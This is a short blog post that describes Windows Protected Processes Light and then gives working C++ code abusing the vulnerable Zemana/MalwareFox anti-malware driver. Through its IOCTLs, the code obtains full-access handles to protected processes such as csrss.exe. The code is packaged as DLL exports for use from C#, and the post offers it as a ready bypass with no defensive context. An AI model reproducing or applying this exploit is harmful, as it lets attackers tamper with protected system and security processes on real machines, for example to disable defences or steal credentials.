DEV Community

Cover image for Bypass Windows PPL
Rake
Rake

Posted on • Updated on

Bypass Windows PPL

PPL stands for "Protected Processes Light," a security feature implemented by Microsoft in Windows. Introduced in Windows 8.1, PPL is designed to protect critical system processes from being tampered with, even by privileged users or software.

The concept of protected processes was initially implemented to safeguard DRM (Digital Rights Management) processes like media playback. However, Microsoft expanded this protection feature to critical system processes for enhancing overall system integrity.

You all know, that are many ways to bypass Windows PPL to get full control of (excample csrss.exe).

I can show you a little way.
There are many vulnerable Driver, for example (Razer and Malware Fox).

I found a good Turotial with the MalwareFox driver.
MalwareFox is an free AntiVirus Programm which uses an Kernel Driver.

I recoded the source a little bit, and I can now export the Project as an DLL file and call the methods from a C# Project to get the Handle with full access (for example csrss.exe).


HANDLE MFAM_GH(DWORD pid) {
    HANDLE hDevice = CreateFile(L"\\\\.\\ZemanaAntiMalware", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hDevice == INVALID_HANDLE_VALUE)
        return (HANDLE)0x0;
    DWORD ourPID = GetCurrentProcessId();
    if (!DeviceIoControl(hDevice, 0x80002010, &ourPID, sizeof(DWORD), NULL, 0, NULL, NULL)) {
        CloseHandle(hDevice);
        return (HANDLE)0x0;
    }
    HANDLE hProcess = NULL;
    DeviceIoControl(hDevice, 0x8000204C, &pid, sizeof(DWORD), &hProcess, sizeof(HANDLE), NULL, NULL);
    CloseHandle(hDevice);
    return hProcess;
}

HANDLE handle_htest2;

//Gives the Handle to application
extern "C" __declspec(dllexport) void GiveH(int csiid, int prcid)
{
    HANDLE htest = OpenProcess(PROCESS_ALL_ACCESS, FALSE, csiid);
    DWORD pid = csiid;
    DWORD dere = prcid;
    HANDLE hProcess = MFAM_GH(pid);
    handle_htest2 = MFAM_GH(dere);
    return;
}

//Get Handle as variable
extern "C" __declspec(dllexport) HANDLE _handleGet(HANDLE handle_h)
{
    handle_h = handle_htest2;
    return handle_h;
}

Enter fullscreen mode Exit fullscreen mode

image

Original Article by NachoModding

More Infosec Articles​

Top comments (0)